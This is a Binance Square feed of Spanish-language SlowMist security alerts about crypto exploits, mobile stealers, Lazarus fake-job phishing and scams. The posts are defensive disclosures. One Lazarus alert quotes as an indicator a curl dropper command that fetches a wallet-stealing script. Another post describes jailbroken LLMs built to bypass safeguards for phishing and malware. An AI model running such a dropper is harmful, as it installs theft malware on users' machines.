Binance Square

SlowMist_Team

0 Siguiendo
1 Seguidores
2 Me gusta
0 Compartido
Publicaciones
·
--
🚨Alerta TI de SlowMist🚨 Nuestro sistema de monitoreo MistEye ha detectado transacciones sospechosas involucrando a @ResupplyFi, con pérdidas de aproximadamente $5.59M. El atacante manipuló la tasa de cambio de cvcrvUSD haciendo donaciones al contrato del Controlador de cvcrvUSD, robando en última instancia una gran cantidad de tokens reUSD. ¡Como siempre, mantente alerta!
🚨Alerta TI de SlowMist🚨

Nuestro sistema de monitoreo MistEye ha detectado transacciones sospechosas involucrando a @ResupplyFi, con pérdidas de aproximadamente $5.59M.

El atacante manipuló la tasa de cambio de cvcrvUSD haciendo donaciones al contrato del Controlador de cvcrvUSD, robando en última instancia una gran cantidad de tokens reUSD.

¡Como siempre, mantente alerta!
🚨Alerta TI de SlowMist🚨 Nuestro sistema de monitoreo MistEye ha detectado transacciones sospechosas que involucran a @ResupplyFi, con pérdidas de aproximadamente $5.59M. El atacante manipuló la tasa de cambio de cvcrvUSD haciendo donaciones al contrato del Controlador crvUSD, robando en última instancia una gran cantidad de tokens reUSD. ¡Como siempre, mantente alerta!
🚨Alerta TI de SlowMist🚨

Nuestro sistema de monitoreo MistEye ha detectado transacciones sospechosas que involucran a @ResupplyFi, con pérdidas de aproximadamente $5.59M.

El atacante manipuló la tasa de cambio de cvcrvUSD haciendo donaciones al contrato del Controlador crvUSD, robando en última instancia una gran cantidad de tokens reUSD.

¡Como siempre, mantente alerta!
🚨 Alerta TI de SlowMist 🚨 Un nuevo malware llamado #SparkKitty que roba todas las fotos de dispositivos iOS & Android infectados — buscando frases semilla de billeteras criptográficas. ⚠️ Entregado a través de: 🔸 "币coin" (App Store) 🔸 "SOEX" (Google Play, más de 10K instalaciones, ahora eliminado) 🔸 Aplicaciones de casino, juegos para adultos, clones de TikTok 🌍 Principalmente dirigido a usuarios en el sudeste asiático & China, pero sin límites regionales. 🛡️ Consejos clave: 🔹 No instales aplicaciones desconocidas 🔹 Evita la carga lateral de APK 🔹 Usa herramientas antivirus ¡Mantente alerta! (Fuente: @kaspersky)
🚨 Alerta TI de SlowMist 🚨

Un nuevo malware llamado #SparkKitty que roba todas las fotos de dispositivos iOS & Android infectados — buscando frases semilla de billeteras criptográficas.

⚠️ Entregado a través de:
🔸 "币coin" (App Store)
🔸 "SOEX" (Google Play, más de 10K instalaciones, ahora eliminado)
🔸 Aplicaciones de casino, juegos para adultos, clones de TikTok

🌍 Principalmente dirigido a usuarios en el sudeste asiático & China, pero sin límites regionales.

🛡️ Consejos clave:
🔹 No instales aplicaciones desconocidas
🔹 Evita la carga lateral de APK
🔹 Usa herramientas antivirus

¡Mantente alerta! (Fuente: @kaspersky)
💰Más de $50B USDT en depósitos y $50B en retiros fluyeron a través de HuionePay en los últimos 18 meses — ahora bajo el escrutinio regulatorio global por supuestamente recibir, mover y retirar fondos de estafa (principalmente a través de USDT en TRON). Investigamos los datos con @MistTrack_io y construimos un panel de Dune para mapear su huella en la cadena. 📊Panel: https://t.co/DHKtY3X9th ✍️Informe: https://t.co/O6uWC2S1qU #TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
💰Más de $50B USDT en depósitos y $50B en retiros fluyeron a través de HuionePay en los últimos 18 meses — ahora bajo el escrutinio regulatorio global por supuestamente recibir, mover y retirar fondos de estafa (principalmente a través de USDT en TRON).

Investigamos los datos con @MistTrack_io y construimos un panel de Dune para mapear su huella en la cadena.

📊Panel: https://t.co/DHKtY3X9th
✍️Informe: https://t.co/O6uWC2S1qU

#TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
🚨 Alerta de Seguridad TI 🚨 Según el socio de la comunidad @1nf0s3cpt, una campaña activa de phishing está dirigidendo a usuarios de Web3 con ofertas de trabajo falsas (por ejemplo, $120/hora) para engañarlos y hacer que ejecuten un script malicioso que roba archivos de billetera. 🔍 IOCs clave: 🔸Repositorio de GitLab: https://t.co/ivGN93PS4b 🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _" 🧪 El método de ataque es muy similar al uso previo de Lazarus de paquetes NPM para difundir código malicioso: https://t.co/bBC4i2vYpA 🚨 Encontramos que un nuevo paquete NPM malicioso acaba de ser publicado: https://t.co/SjgmO1FOIL 🔸Probablemente vinculado a GitHub: apollo-hero 🔸Correo del cargador: skelstar125@gmail.com ⚠️ NO instales ni ejecutes paquetes o scripts desconocidos. Siempre verifica las fuentes. #LAZARUS #Phishing
🚨 Alerta de Seguridad TI 🚨

Según el socio de la comunidad @1nf0s3cpt, una campaña activa de phishing está dirigidendo a usuarios de Web3 con ofertas de trabajo falsas (por ejemplo, $120/hora) para engañarlos y hacer que ejecuten un script malicioso que roba archivos de billetera.

🔍 IOCs clave:
🔸Repositorio de GitLab: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 El método de ataque es muy similar al uso previo de Lazarus de paquetes NPM para difundir código malicioso:
https://t.co/bBC4i2vYpA

🚨 Encontramos que un nuevo paquete NPM malicioso acaba de ser publicado:
https://t.co/SjgmO1FOIL
🔸Probablemente vinculado a GitHub: apollo-hero
🔸Correo del cargador: skelstar125@gmail.com

⚠️ NO instales ni ejecutes paquetes o scripts desconocidos. Siempre verifica las fuentes.

#LAZARUS #Phishing
🚨Alerta TI de SlowMist🚨 MistEye ha detectado actividades sospechosas potenciales relacionadas con el @Bankroll_Status. ¡Como siempre, mantente alerta! https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
🚨Alerta TI de SlowMist🚨

MistEye ha detectado actividades sospechosas potenciales relacionadas con el @Bankroll_Status.

¡Como siempre, mantente alerta!

https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
🚨Alerta de Seguridad de SlowMist🚨 Hemos detectado actividades sospechosas potenciales relacionadas con @meta_pool. La causa raíz es que la función _deposit ha sido reescrita, permitiendo la acuñación arbitraria a través de la función mint sin la necesidad de transferir tokens. ¡Como siempre, mantente alerta!
🚨Alerta de Seguridad de SlowMist🚨

Hemos detectado actividades sospechosas potenciales relacionadas con @meta_pool. La causa raíz es que la función _deposit ha sido reescrita, permitiendo la acuñación arbitraria a través de la función mint sin la necesidad de transferir tokens.

¡Como siempre, mantente alerta!
🚨 Alerta de Seguridad de SlowMist 🚨 ‼️ Cuidado con una nueva amenaza del grupo APT LAZARUS — el malware ladrón de información #OtterCookie está apuntando a profesionales en las industrias financiera y cripto. 🎯 Tácticas de ataque: 🔹 Hacerse pasar por empresas de renombre con entrevistas falsas o propuestas de inversión 🔹 Usar deepfakes para hacerse pasar por entrevistadores/inversores en videollamadas 🔹 Engañar a las víctimas para que ejecuten malware disfrazado de desafíos de codificación o actualizaciones de aplicaciones de video 🔹 Una vez ejecutado, OtterCookie roba datos sensibles en silencio 🕵️‍♂️ Los objetivos incluyen: 🔹 Credenciales almacenadas en el navegador 🔹 Contraseñas y certificados del llavero de macOS 🔹 Información de billetera cripto almacenada localmente y claves privadas 🛡️ Mantente a salvo: 🔹 Verifica todas las ofertas de trabajo/inversión no solicitadas 🔹 Nunca ejecutes binarios desconocidos, especialmente “desafíos” o “actualizaciones” 🔹 Usa software antivirus y monitorea comportamientos anormales 📚 Lee más sobre #APT: https://t.co/hyzwQoiu23 cc @im23pds
🚨 Alerta de Seguridad de SlowMist 🚨

‼️ Cuidado con una nueva amenaza del grupo APT LAZARUS — el malware ladrón de información #OtterCookie está apuntando a profesionales en las industrias financiera y cripto.

🎯 Tácticas de ataque:
🔹 Hacerse pasar por empresas de renombre con entrevistas falsas o propuestas de inversión
🔹 Usar deepfakes para hacerse pasar por entrevistadores/inversores en videollamadas
🔹 Engañar a las víctimas para que ejecuten malware disfrazado de desafíos de codificación o actualizaciones de aplicaciones de video
🔹 Una vez ejecutado, OtterCookie roba datos sensibles en silencio

🕵️‍♂️ Los objetivos incluyen:
🔹 Credenciales almacenadas en el navegador
🔹 Contraseñas y certificados del llavero de macOS
🔹 Información de billetera cripto almacenada localmente y claves privadas

🛡️ Mantente a salvo:
🔹 Verifica todas las ofertas de trabajo/inversión no solicitadas
🔹 Nunca ejecutes binarios desconocidos, especialmente “desafíos” o “actualizaciones”
🔹 Usa software antivirus y monitorea comportamientos anormales

📚 Lee más sobre #APT:

https://t.co/hyzwQoiu23

cc @im23pds
🚨Alerta de Seguridad de SlowMist🚨 SlowMist recibió recientemente información indicando que el grupo APT Lazarus está utilizando un nuevo ladrón llamado OtterCookie en ataques dirigidos a profesionales de criptomonedas y finanzas. 🎭Tácticas: - Entrevistas de trabajo falsas/llamadas de inversores - Videos deepfake para suplantar reclutadores - Malware disfrazado como “desafíos de programación” o “actualizaciones” 😈Robo: - Credenciales de inicio de sesión almacenadas en el navegador - Contraseñas y certificados del llavero de macOS - Información de billetera y claves privadas 🛡️Recomendaciones de Seguridad: 🔹Tratar ofertas de trabajo/inversión no solicitadas y entrevistas remotas con precaución. 🔹Nunca ejecutar binarios desconocidos, especialmente si se presentan como “desafíos técnicos” o “paquetes de actualización.” 🔹Mejorar las capacidades de EDR y monitorear actividades anormales. Usar herramientas antivirus y auditar regularmente sus puntos finales. ⚠️Mantente seguro — siempre verifica antes de confiar. #Lazarus #APT #OtterCookie #SeguridadCripto
🚨Alerta de Seguridad de SlowMist🚨

SlowMist recibió recientemente información indicando que el grupo APT Lazarus está utilizando un nuevo ladrón llamado OtterCookie en ataques dirigidos a profesionales de criptomonedas y finanzas.

🎭Tácticas:
- Entrevistas de trabajo falsas/llamadas de inversores
- Videos deepfake para suplantar reclutadores
- Malware disfrazado como “desafíos de programación” o “actualizaciones”

😈Robo:
- Credenciales de inicio de sesión almacenadas en el navegador
- Contraseñas y certificados del llavero de macOS
- Información de billetera y claves privadas

🛡️Recomendaciones de Seguridad:
🔹Tratar ofertas de trabajo/inversión no solicitadas y entrevistas remotas con precaución.
🔹Nunca ejecutar binarios desconocidos, especialmente si se presentan como “desafíos técnicos” o “paquetes de actualización.”
🔹Mejorar las capacidades de EDR y monitorear actividades anormales. Usar herramientas antivirus y auditar regularmente sus puntos finales.

⚠️Mantente seguro — siempre verifica antes de confiar.

#Lazarus #APT #OtterCookie #SeguridadCripto
⚠️A medida que la IA avanza, surge un lado más oscuro: Modelos de Lenguaje de Gran Escala sin Restricciones. A diferencia de los LLMs convencionales con salvaguardias integradas, estos modelos "desbloqueados" o modificados deliberadamente están diseñados para eludir restricciones éticas—facilitando el phishing, la generación de malware y el fraude. En este artículo, exploramos el auge de herramientas como WormGPT, FraudGPT y GhostGPT, su abuso en el espacio cripto y los crecientes desafíos de seguridad que representan. Lee el análisis completo👇 https://t.co/yt1r95mlP4 #IA #Ciberseguridad #LLM #Phishing #Malware
⚠️A medida que la IA avanza, surge un lado más oscuro: Modelos de Lenguaje de Gran Escala sin Restricciones.

A diferencia de los LLMs convencionales con salvaguardias integradas, estos modelos "desbloqueados" o modificados deliberadamente están diseñados para eludir restricciones éticas—facilitando el phishing, la generación de malware y el fraude.

En este artículo, exploramos el auge de herramientas como WormGPT, FraudGPT y GhostGPT, su abuso en el espacio cripto y los crecientes desafíos de seguridad que representan.

Lee el análisis completo👇
https://t.co/yt1r95mlP4

#IA #Ciberseguridad #LLM #Phishing #Malware
🚨 Alerta de Seguridad de SlowMist 🚨 El troyano bancario para Android #Crocodilus ahora está atacando a usuarios de criptomonedas y aplicaciones bancarias a nivel mundial tras recientes actualizaciones. ⚠️ Amenazas clave: 🔹Se propaga a través de actualizaciones falsas de navegador en anuncios de Facebook 🔹Roba credenciales de inicio de sesión utilizando ataques de superposición 🔹Extrae frases semilla de billetera de criptomonedas y claves privadas 🔹Inyecta números falsos de "soporte bancario" en listas de contactos 🔹Malware como Servicio: Disponible para alquilar (100–300 USDT/ataque) 📵 Evita actualizaciones de aplicaciones desconocidas y enlaces de anuncios. ¡Mantente alerta! (Fuente: @ThreatFabric)
🚨 Alerta de Seguridad de SlowMist 🚨

El troyano bancario para Android #Crocodilus ahora está atacando a usuarios de criptomonedas y aplicaciones bancarias a nivel mundial tras recientes actualizaciones.

⚠️ Amenazas clave:

🔹Se propaga a través de actualizaciones falsas de navegador en anuncios de Facebook
🔹Roba credenciales de inicio de sesión utilizando ataques de superposición
🔹Extrae frases semilla de billetera de criptomonedas y claves privadas
🔹Inyecta números falsos de "soporte bancario" en listas de contactos
🔹Malware como Servicio: Disponible para alquilar (100–300 USDT/ataque)

📵 Evita actualizaciones de aplicaciones desconocidas y enlaces de anuncios.

¡Mantente alerta! (Fuente: @ThreatFabric)
🚨Resumen de Seguridad Web3 de Mayo 2025🚨 📊Según Hacked de SlowMist (https://t.co/e90CSvTm6B): ⚠️15 hacks ➡️ ~$257M perdidos ❄️~$162M recuperados/congelados 🎣Pérdidas por phishing a través de @realScamSniffer: 7,164 víctimas ➡️ ~$9.6M robados Incidentes importantes: • El Protocolo Cetus perdió $230M en un ataque de desbordamiento matemático • El Protocolo Cork explotado por más de $12M debido a una validación insuficiente de los datos proporcionados por el usuario • BitoPro perdió $11.5M; fondos blanqueados a través de Tornado Cash, Thorchain y Wasabi • Demex perdió $950K por una manipulación de oráculos que apuntaba a un vault obsoleto • El Protocolo Zunami perdió $500K; causa raíz en investigación Aspectos destacados de seguridad: ⚠️Las vulnerabilidades de contratos causaron el 95% de las pérdidas totales por hacks 🎭Los robos de cuentas aumentaron nuevamente 😈El Grupo Lazarus ahora está atacando a individuos—una víctima perdió $5.2M a causa de malware ✍️Informe completo:
🚨Resumen de Seguridad Web3 de Mayo 2025🚨

📊Según Hacked de SlowMist (https://t.co/e90CSvTm6B):
⚠️15 hacks ➡️ ~$257M perdidos
❄️~$162M recuperados/congelados

🎣Pérdidas por phishing a través de @realScamSniffer:
7,164 víctimas ➡️ ~$9.6M robados

Incidentes importantes:
• El Protocolo Cetus perdió $230M en un ataque de desbordamiento matemático
• El Protocolo Cork explotado por más de $12M debido a una validación insuficiente de los datos proporcionados por el usuario
• BitoPro perdió $11.5M; fondos blanqueados a través de Tornado Cash, Thorchain y Wasabi
• Demex perdió $950K por una manipulación de oráculos que apuntaba a un vault obsoleto
• El Protocolo Zunami perdió $500K; causa raíz en investigación

Aspectos destacados de seguridad:
⚠️Las vulnerabilidades de contratos causaron el 95% de las pérdidas totales por hacks
🎭Los robos de cuentas aumentaron nuevamente
😈El Grupo Lazarus ahora está atacando a individuos—una víctima perdió $5.2M a causa de malware

✍️Informe completo:
🚨Advertencia de Estafa Recientemente ayudamos a un usuario que encontró una herramienta sospechosa que afirmaba que su billetera tenía una “autorización riesgosa.” La herramienta lo instó a pegar su clave privada para resolver el problema. Después de investigar, identificamos el sitio—signature[.]land—como una plataforma de phishing. El sitio también ha sido marcado como malicioso por la plataforma anti-estafa Web3 @realScamSniffer. Conclusiones clave: ♦️La interfaz imita la herramienta legítima Revoke ♦️Los resultados de riesgo son fabricados para cualquier entrada ♦️Toda la entrada del usuario se envía directamente a: abpulimali@gmail[.]com El operador detrás de este sitio, @Titanspace3, emplea múltiples tácticas engañosas: 🎭Usa el avatar de @zachxbt en Telegram 🎭Se hace pasar por un empleado de SlowMist 🎭Opera una cuenta de X con 74K seguidores, comentando frecuentemente bajo las publicaciones de usuarios de cripto, afirmando falsamente que sus billeteras están en riesgo y dirigiéndolos a un enlace de phishing disfrazado como una “herramienta de seguridad.” Flujo de estafa: 1⃣Fabricar pánico alrededor de “aprobaciones riesgosas” 2⃣Atraer a las víctimas a usar un sitio de phishing 3⃣Instruirles a ingresar claves privadas para “revocación” 🛡️Recomendaciones – Nunca pegues tu clave privada en ningún sitio web – Usa solo herramientas de seguridad de fuentes verificadas y oficiales – Mantente vigilante y sigue una mentalidad de cero confianza Para un desglose completo de este caso, consulta nuestro último artículo: https://t.co/IvrVPrT6Su #Phishing #Cripto #Web3 #Estafa #IngenieríaSocial #Revocar
🚨Advertencia de Estafa

Recientemente ayudamos a un usuario que encontró una herramienta sospechosa que afirmaba que su billetera tenía una “autorización riesgosa.” La herramienta lo instó a pegar su clave privada para resolver el problema.

Después de investigar, identificamos el sitio—signature[.]land—como una plataforma de phishing. El sitio también ha sido marcado como malicioso por la plataforma anti-estafa Web3 @realScamSniffer.

Conclusiones clave:
♦️La interfaz imita la herramienta legítima Revoke
♦️Los resultados de riesgo son fabricados para cualquier entrada
♦️Toda la entrada del usuario se envía directamente a: abpulimali@gmail[.]com

El operador detrás de este sitio, @Titanspace3, emplea múltiples tácticas engañosas:
🎭Usa el avatar de @zachxbt en Telegram
🎭Se hace pasar por un empleado de SlowMist
🎭Opera una cuenta de X con 74K seguidores, comentando frecuentemente bajo las publicaciones de usuarios de cripto, afirmando falsamente que sus billeteras están en riesgo y dirigiéndolos a un enlace de phishing disfrazado como una “herramienta de seguridad.”

Flujo de estafa:
1⃣Fabricar pánico alrededor de “aprobaciones riesgosas”
2⃣Atraer a las víctimas a usar un sitio de phishing
3⃣Instruirles a ingresar claves privadas para “revocación”

🛡️Recomendaciones
– Nunca pegues tu clave privada en ningún sitio web
– Usa solo herramientas de seguridad de fuentes verificadas y oficiales
– Mantente vigilante y sigue una mentalidad de cero confianza

Para un desglose completo de este caso, consulta nuestro último artículo:
https://t.co/IvrVPrT6Su

#Phishing #Cripto #Web3 #Estafa #IngenieríaSocial #Revocar
🎉 SlowMist x Foresight News Festival del Barco Dragón Sorteo 🎉 Tu frase mnemotécnica es la línea de vida de tu cripto — mantenla segura, mantenla en mente. 🧠⛓️ @Foresight_News acaba de lanzar un nuevo coleccionable genial, ¡estamos regalando 3 a la comunidad! Para participar: 1⃣ Sigue a @Foresight_News & @SlowMist_Team 2⃣ Da like + RT a este tweet & etiqueta a 3 amigos Ganadores anunciados: 4 de junio 🎁 ¡Buena suerte a todos!🤩
🎉 SlowMist x Foresight News Festival del Barco Dragón Sorteo 🎉

Tu frase mnemotécnica es la línea de vida de tu cripto — mantenla segura, mantenla en mente. 🧠⛓️

@Foresight_News acaba de lanzar un nuevo coleccionable genial, ¡estamos regalando 3 a la comunidad!

Para participar:
1⃣ Sigue a @Foresight_News & @SlowMist_Team
2⃣ Da like + RT a este tweet & etiqueta a 3 amigos

Ganadores anunciados: 4 de junio 🎁

¡Buena suerte a todos!🤩
🚨Alerta de Seguridad de SlowMist🚨 Detectamos actividad sospechosa potencial relacionada con @Corkprotocol. ¡Como siempre, mantente alerta!
🚨Alerta de Seguridad de SlowMist🚨

Detectamos actividad sospechosa potencial relacionada con @Corkprotocol.

¡Como siempre, mantente alerta!
🚨Alerta de Seguridad de SlowMist🚨 ☠️Recientemente, múltiples usuarios han informado haber recibido mensajes de texto de "exchanges bien conocidos", diciendo: 🎭"Tu código de verificación de retiro es xxx. Si no solicitaste esta transacción, llama a xxx inmediatamente para obtener asistencia." 📱Una vez que devuelves la llamada, te dicen que es una “violación de seguridad” y te conectan con alguien que dice ser del “soporte de billetera hardware.” 🎣Te guían a un sitio de phishing y te engañan para que ingreses tu frase mnemotécnica — lo que resulta en robos de billetera fría por un valor de más de $1 millón. ⚠️Los estafadores saben que confías en los exchanges — y explotan esa confianza para engañarte, paso a paso. Recientemente divulgamos un caso similar — consulta nuestro informe detallado para fortalecer tu conciencia y defensas: https://t.co/OLGtlY1HBV Recuerda: 🔒Nunca compartas tu frase mnemotécnica. 🚫No confíes en llamadas, mensajes de texto o enlaces inesperados. Siempre verifica a través de fuentes oficiales. #SeguridadWeb3 #AlertaDePhishing #BilleteraFría #EstafaCrypto #IngenieríaSocial
🚨Alerta de Seguridad de SlowMist🚨

☠️Recientemente, múltiples usuarios han informado haber recibido mensajes de texto de "exchanges bien conocidos", diciendo:

🎭"Tu código de verificación de retiro es xxx. Si no solicitaste esta transacción, llama a xxx inmediatamente para obtener asistencia."

📱Una vez que devuelves la llamada, te dicen que es una “violación de seguridad” y te conectan con alguien que dice ser del “soporte de billetera hardware.”

🎣Te guían a un sitio de phishing y te engañan para que ingreses tu frase mnemotécnica — lo que resulta en robos de billetera fría por un valor de más de $1 millón.

⚠️Los estafadores saben que confías en los exchanges — y explotan esa confianza para engañarte, paso a paso.

Recientemente divulgamos un caso similar — consulta nuestro informe detallado para fortalecer tu conciencia y defensas:
https://t.co/OLGtlY1HBV

Recuerda:
🔒Nunca compartas tu frase mnemotécnica.
🚫No confíes en llamadas, mensajes de texto o enlaces inesperados. Siempre verifica a través de fuentes oficiales.

#SeguridadWeb3 #AlertaDePhishing #BilleteraFría #EstafaCrypto #IngenieríaSocial
En los últimos años, los usuarios de Coinbase se han convertido repetidamente en objetivos de ataques de ingeniería social, y el 15 de mayo, Coinbase confirmó la participación de informantes. Cómo funciona: 📞 Llamada de soporte falso 📲 Guiar al usuario a través de Coinbase Wallet ⚠️ Proporcionar frase mnemotécnica de estafa 💸 Drenar activos bajo estrés y urgencia Con @MistTrack_io, rastreamos los flujos: ▪️ BTC puenteado a través de THORChain / Chainflip / Defiway Bridge → DAI/USDT ▪️ ETH intercambiado en Uniswap → DAI/USDT ▪️ Fondos lavados o aún inactivos Desglose completo👇 https://t.co/OLGtlY2frt #CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
En los últimos años, los usuarios de Coinbase se han convertido repetidamente en objetivos de ataques de ingeniería social, y el 15 de mayo, Coinbase confirmó la participación de informantes.

Cómo funciona:

📞 Llamada de soporte falso
📲 Guiar al usuario a través de Coinbase Wallet
⚠️ Proporcionar frase mnemotécnica de estafa
💸 Drenar activos bajo estrés y urgencia

Con @MistTrack_io, rastreamos los flujos:

▪️ BTC puenteado a través de THORChain / Chainflip / Defiway Bridge → DAI/USDT
▪️ ETH intercambiado en Uniswap → DAI/USDT
▪️ Fondos lavados o aún inactivos

Desglose completo👇
https://t.co/OLGtlY2frt

#CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
🚨Alerta de Seguridad de SlowMist🚨 Hemos detectado actividad sospechosa potencial relacionada con @Nexo. ¡Como siempre, mantente alerta! https://bscscan.com/address/0x0851ae80e137c53a8dbc48fce82efd1f50f3b9f2
🚨Alerta de Seguridad de SlowMist🚨

Hemos detectado actividad sospechosa potencial relacionada con @Nexo.

¡Como siempre, mantente alerta!

https://bscscan.com/address/0x0851ae80e137c53a8dbc48fce82efd1f50f3b9f2
🚨Alerta de Estafa de SlowMist🚨 Hemos recibido informes de grupos falsos de Telegram que se hacen pasar por #SlowMist y estafan a los usuarios a través de enlaces de inversión de phishing. Un ejemplo: ❌t[.]me/slowmist1 — este NO somos nosotros.‼️ ✅ Por favor, informa de tales grupos a Telegram de inmediato. Para tu seguridad, siempre consulta nuestros canales oficiales: 1⃣Sitio web: https://t.co/IO2VWk2pae 2⃣X: @SlowMist_Team & @MistTrack_io 3⃣Correo electrónico: team@slowmist.com Si tienes dudas, no dudes en enviarnos un DM directamente. ⚠️Mantente alerta y verifica antes de confiar.
🚨Alerta de Estafa de SlowMist🚨

Hemos recibido informes de grupos falsos de Telegram que se hacen pasar por #SlowMist y estafan a los usuarios a través de enlaces de inversión de phishing. Un ejemplo: ❌t[.]me/slowmist1 — este NO somos nosotros.‼️

✅ Por favor, informa de tales grupos a Telegram de inmediato.

Para tu seguridad, siempre consulta nuestros canales oficiales:
1⃣Sitio web: https://t.co/IO2VWk2pae
2⃣X: @SlowMist_Team & @MistTrack_io
3⃣Correo electrónico: team@slowmist.com

Si tienes dudas, no dudes en enviarnos un DM directamente.

⚠️Mantente alerta y verifica antes de confiar.
🚀¡Grandes noticias! @MistTrack_io MCP ya está en vivo para pruebas! Ahora puedes usar lenguaje natural en #Claude, #Cursor y otros clientes compatibles con MCP para llamar a las APIs de análisis on-chain de #MistTrack — desde perfilado de direcciones & puntuación de riesgos hasta gráficos de flujo de fondos. 🧐Investigaciones en blockchain más inteligentes, rápidas y fáciles — impulsadas por IA. ✍️En nuestra última publicación: 🔹¿Qué es MistTrack MCP? 🔹Cómo usarlo 🔹Características principales 🔹Ejemplos de casos de uso reales https://t.co/Fvn2YZIuoI 👋¿Listo para explorar el nuevo paradigma de IA para el trazado on-chain? Comienza aquí: https://t.co/UCDcC9Dt51 #Web3 #IA #SeguridadBlockchain #MCP
🚀¡Grandes noticias! @MistTrack_io MCP ya está en vivo para pruebas!

Ahora puedes usar lenguaje natural en #Claude, #Cursor y otros clientes compatibles con MCP para llamar a las APIs de análisis on-chain de #MistTrack — desde perfilado de direcciones & puntuación de riesgos hasta gráficos de flujo de fondos.

🧐Investigaciones en blockchain más inteligentes, rápidas y fáciles — impulsadas por IA.

✍️En nuestra última publicación:
🔹¿Qué es MistTrack MCP?
🔹Cómo usarlo
🔹Características principales
🔹Ejemplos de casos de uso reales
https://t.co/Fvn2YZIuoI

👋¿Listo para explorar el nuevo paradigma de IA para el trazado on-chain? Comienza aquí:
https://t.co/UCDcC9Dt51

#Web3 #IA #SeguridadBlockchain #MCP
Inicia sesión para explorar más contenidos
Descubre las últimas noticias sobre criptomonedas
⚡️ Participa en los debates más recientes sobre criptomonedas
💬 Interactúa con tus creadores favoritos
👍 Disfruta del contenido que te interesa
Correo electrónico/número de teléfono
Mapa del sitio
Preferencias de cookies
Términos y condiciones de la plataforma